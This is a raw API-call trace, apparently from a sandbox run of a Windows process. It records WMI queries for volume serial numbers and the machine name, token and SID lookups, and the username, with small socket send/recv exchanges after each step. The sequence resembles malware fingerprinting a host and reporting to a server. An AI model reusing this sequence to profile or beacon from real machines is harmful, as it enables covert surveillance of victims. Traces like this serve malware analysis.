	[0196.832] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.832] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0196.832] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0196.832] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0196.832] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0196.832] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd14510, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
	[0196.832] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0196.832] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.832] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd14510, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
	[0196.832] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0196.832] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.832] IWbemClassObject:GetNames (in: This=0x1cd18410, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c6ecea8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c6ecea0 | out: pNames=0x1c6ecea0*="\x01ƀ\x08") returned 0x0
	[0196.833] SafeArrayGetDim (psa=0x1b8322a0) returned 0x1
	[0196.833] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__GENUS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0196.833] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__CLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0196.833] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0196.833] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0196.833] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
	[0196.834] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__DYNASTY", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0196.834] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0196.834] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__RELPATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0196.834] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0196.834] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0196.834] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__DERIVATION", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b8322a0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b8397d0, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x1c6ece9c*=8200, plFlavor=0x1c6ece98*=64) returned 0x0
	[0196.835] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__SERVER", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0196.835] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0196.835] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0196.835] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0196.835] IWbemClassObject:Get (in: This=0x1cd18410, wszName="__PATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0196.835] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0196.835] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd14510, puCount=0x1c6ecf40 | out: puCount=0x1c6ecf40*=0x2) returned 0x0
	[0196.835] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ecf40*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf40*=0x17, pszText=0x0) returned 0x0
	[0196.835] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ecf40*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf40*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.835] IWbemClassObject:Get (in: This=0x1cd18410, wszName="SerialNumber", lFlags=0, pVal=0x1c6ecf30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf2c*=0, plFlavor=0x1c6ecf28*=0 | out: pVal=0x1c6ecf30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c6ecf2c*=19, plFlavor=0x1c6ecf28*=0) returned 0x0
	[0196.835] IWbemClassObject:Get (in: This=0x1cd18410, wszName="SerialNumber", lFlags=0, pVal=0x1c6ed160*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ed15c*=19, plFlavor=0x1c6ed158*=0 | out: pVal=0x1c6ed160*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c6ed15c*=19, plFlavor=0x1c6ed158*=0) returned 0x0
	[0196.838] send (s=0x414, buf=0x3085c88*, len=36, flags=0) returned 36
	[0196.839] recv (in: s=0x414, buf=0x3065f58, len=502, flags=0 | out: buf=0x3065f58*) returned 88
	[0196.845] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0196.846] send (s=0x414, buf=0x3098c58*, len=34, flags=0) returned 34
	[0196.847] recv (in: s=0x414, buf=0x3065f58, len=502, flags=0 | out: buf=0x3065f58*) returned 121
	[0197.085] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0197.086] GetCurrentProcess () returned 0xffffffffffffffff
	[0197.086] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecf18 | out: TokenHandle=0x1c6ecf18*=0x4b0) returned 1
	[0197.086] GetCurrentProcess () returned 0xffffffffffffffff
	[0197.086] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecfe8 | out: TokenHandle=0x1c6ecfe8*=0x4ac) returned 1
	[0197.087] GetTokenInformation (in: TokenHandle=0x4b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1c6ecfd8 | out: TokenInformation=0x0, ReturnLength=0x1c6ecfd8) returned 0
	[0197.087] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1b832290
	[0197.087] GetTokenInformation (in: TokenHandle=0x4b0, TokenInformationClass=0x1, TokenInformation=0x1b832290, TokenInformationLength=0x2c, ReturnLength=0x1c6ecfd8 | out: TokenInformation=0x1b832290, ReturnLength=0x1c6ecfd8) returned 1
	[0197.088] LocalFree (hMem=0x1b832290) returned 0x0
	[0197.088] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x1c6ece08, DesiredAccess=0x800, PolicyHandle=0x1c6ece00 | out: PolicyHandle=0x1c6ece00) returned 0x0
	[0197.089] LsaLookupSids (in: PolicyHandle=0x1b832290, Count=0x1, Sids=0x30aaf08*=0x30aae68*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x1c6ece90, Names=0x1c6ece88 | out: ReferencedDomains=0x1c6ece90, Names=0x1c6ece88) returned 0x0
	[0197.089] LsaClose (ObjectHandle=0x1b832290) returned 0x0
	[0197.089] LsaFreeMemory (Buffer=0x1b822da0) returned 0x0
	[0197.090] LsaFreeMemory (Buffer=0x1b829520) returned 0x0
	[0197.090] send (s=0x414, buf=0x30abb08*, len=49, flags=0) returned 49
	[0197.091] recv (in: s=0x414, buf=0x3065f58, len=502, flags=0 | out: buf=0x3065f58*) returned 91
	[0198.086] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0198.092] CoTaskMemAlloc (cb=0x204) returned 0x3e72d0
	[0198.092] GetUserNameW (in: lpBuffer=0x3e72d0, pcbBuffer=0x1c6ed198 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1c6ed198) returned 1
	[0198.092] CoTaskMemFree (pv=0x3e72d0) 
	[0198.093] send (s=0x414, buf=0x30bd970*, len=43, flags=0) returned 43
	[0198.094] recv (in: s=0x414, buf=0x3065f58, len=502, flags=0 | out: buf=0x3065f58*) returned 108
	[0199.091] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0199.097] CoGetObjectContext (in: riid=0x1c6ecd78*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd70 | out: ppv=0x1c6ecd70*=0x321868) returned 0x0
	[0199.098] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd90 | out: pAptType=0x1c6ecd90*=1) returned 0x0
	[0199.098] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece98 | out: ppvObject=0x1c6ece98*=0x0) returned 0x80004002
	[0199.098] IUnknown:Release (This=0x321868) returned 0x1
	[0199.098] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec400 | out: ppv=0x1c6ec400*=0x1cd11980) returned 0x0
	[0199.099] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd11980, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec110 | out: ppvObject=0x1c6ec110*=0x0) returned 0x80004002
	[0199.099] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd11980, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0f8 | out: ppvObject=0x1c6ec0f8*=0x1cd18280) returned 0x0
	[0199.099] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd18280, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec000 | out: ppvObject=0x1c6ec000*=0x1cd18280) returned 0x0
	[0199.099] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd18280, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec080 | out: ppvObject=0x1c6ec080*=0x0) returned 0x80004002
	[0199.100] WbemDefPath:IUnknown:AddRef (This=0x1cd18280) returned 0x3
	[0199.100] CoGetContextToken (in: pToken=0x1c6ebcd0 | out: pToken=0x1c6ebcd0) returned 0x0
	[0199.100] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd18280, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc90 | out: ppvObject=0x1c6ebc90*=0x1b83a880) returned 0x0
	[0199.100] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b83a880, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebcc0 | out: pCid=0x1c6ebcc0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0199.100] WbemDefPath:IUnknown:Release (This=0x1b83a880) returned 0x3
	[0199.100] CoGetContextToken (in: pToken=0x1c6ebca0 | out: pToken=0x1c6ebca0) returned 0x0
	[0199.100] WbemDefPath:IUnknown:AddRef (This=0x1cd18280) returned 0x4
	[0199.100] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd18280, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebdb8 | out: ppvObject=0x1c6ebdb8*=0x0) returned 0x80004002
	[0199.100] WbemDefPath:IUnknown:Release (This=0x1cd18280) returned 0x3
	[0199.100] WbemDefPath:IUnknown:Release (This=0x1cd18280) returned 0x2
	[0199.101] WbemDefPath:IUnknown:Release (This=0x1cd11980) returned 0x0
	[0199.101] WbemDefPath:IUnknown:Release (This=0x1cd18280) returned 0x1
	[0199.101] CoGetContextToken (in: pToken=0x1c6ec9d0 | out: pToken=0x1c6ec9d0) returned 0x0
	[0199.101] CoGetContextToken (in: pToken=0x1c6ec910 | out: pToken=0x1c6ec910) returned 0x0
	[0199.101] WbemDefPath:IUnknown:AddRef (This=0x1cd18280) returned 0x2
	[0199.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd18280, riid=0x1c6eca50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6eca30 | out: ppvObject=0x1c6eca30*=0x1cd18280) returned 0x0
	[0199.101] WbemDefPath:IUnknown:Release (This=0x1cd18280) returned 0x2
	[0199.101] WbemDefPath:IUnknown:Release (This=0x1cd18280) returned 0x1
	[0199.101] CoGetContextToken (in: pToken=0x1c6ecb50 | out: pToken=0x1c6ecb50) returned 0x0
	[0199.101] CoGetContextToken (in: pToken=0x1c6eca90 | out: pToken=0x1c6eca90) returned 0x0
	[0199.101] WbemDefPath:IUnknown:AddRef (This=0x1cd18280) returned 0x2
	[0199.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd18280, riid=0x1c6ecbd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecbb0 | out: ppvObject=0x1c6ecbb0*=0x1cd18280) returned 0x0
	[0199.102] WbemDefPath:IUnknown:Release (This=0x1cd18280) returned 0x2
	[0199.102] WbemDefPath:IUnknown:AddRef (This=0x1cd18280) returned 0x3
	[0199.102] WbemDefPath:IWbemPath:SetText (This=0x1cd18280, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.102] WbemDefPath:IUnknown:Release (This=0x1cd18280) returned 0x2
	[0199.102] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd18280, puCount=0x1c6ece60 | out: puCount=0x1c6ece60*=0x2) returned 0x0
	[0199.102] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ece60*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece60*=0x17, pszText=0x0) returned 0x0
	[0199.102] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ece60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.102] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd18280, puCount=0x1c6ece10 | out: puCount=0x1c6ece10*=0x2) returned 0x0
	[0199.102] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ece10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece10*=0x17, pszText=0x0) returned 0x0
	[0199.102] WbemDefPath:IWbemPath:GetText (in: This=0x1cd18280, lFlags=4, puBuffLength=0x1c6ece10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.102] CoGetObjectContext (in: riid=0x1c6ecd48*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd40 | out: ppv=0x1c6ecd40*=0x321868) returned 0x0
	[0199.102] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd60 | out: pAptType=0x1c6ecd60*=1) returned 0x0
	[0199.102] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece68 | out: ppvObject=0x1c6ece68*=0x0) returned 0x80004002
	[0199.102] IUnknown:Release (This=0x321868) returned 0x1
	[0199.103] CoGetClassObject (in: rclsid=0x1b82a6d8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec9f0 | out: ppv=0x1c6ec9f0*=0x1cd11a20) returned 0x0
	[0199.103] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11a20, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec700 | out: ppvObject=0x1c6ec700*=0x0) returned 0x80004002
	[0199.103] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cd11a20, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec6e8 | out: ppvObject=0x1c6ec6e8*=0x1cd11a40) returned 0x0
	[0199.103] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11a40, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5f0 | out: ppvObject=0x1c6ec5f0*=0x1cd11a40) returned 0x0
	[0199.103] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11a40, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec670 | out: ppvObject=0x1c6ec670*=0x0) returned 0x80004002
	[0199.104] WbemLocator:IUnknown:AddRef (This=0x1cd11a40) returned 0x3
	[0199.104] CoGetContextToken (in: pToken=0x1c6ec2c0 | out: pToken=0x1c6ec2c0) returned 0x0
	[0199.104] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11a40, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec280 | out: ppvObject=0x1c6ec280*=0x0) returned 0x80004002
	[0199.104] CoGetContextToken (in: pToken=0x1c6ec290 | out: pToken=0x1c6ec290) returned 0x0
	[0199.104] WbemLocator:IUnknown:AddRef (This=0x1cd11a40) returned 0x4
	[0199.104] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11a40, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec3a8 | out: ppvObject=0x1c6ec3a8*=0x0) returned 0x80004002
	[0199.104] WbemLocator:IUnknown:Release (This=0x1cd11a40) returned 0x3
	[0199.104] WbemLocator:IUnknown:Release (This=0x1cd11a40) returned 0x2
	[0199.104] WbemLocator:IUnknown:Release (This=0x1cd11a20) returned 0x0
	[0199.104] WbemLocator:IUnknown:Release (This=0x1cd11a40) returned 0x1
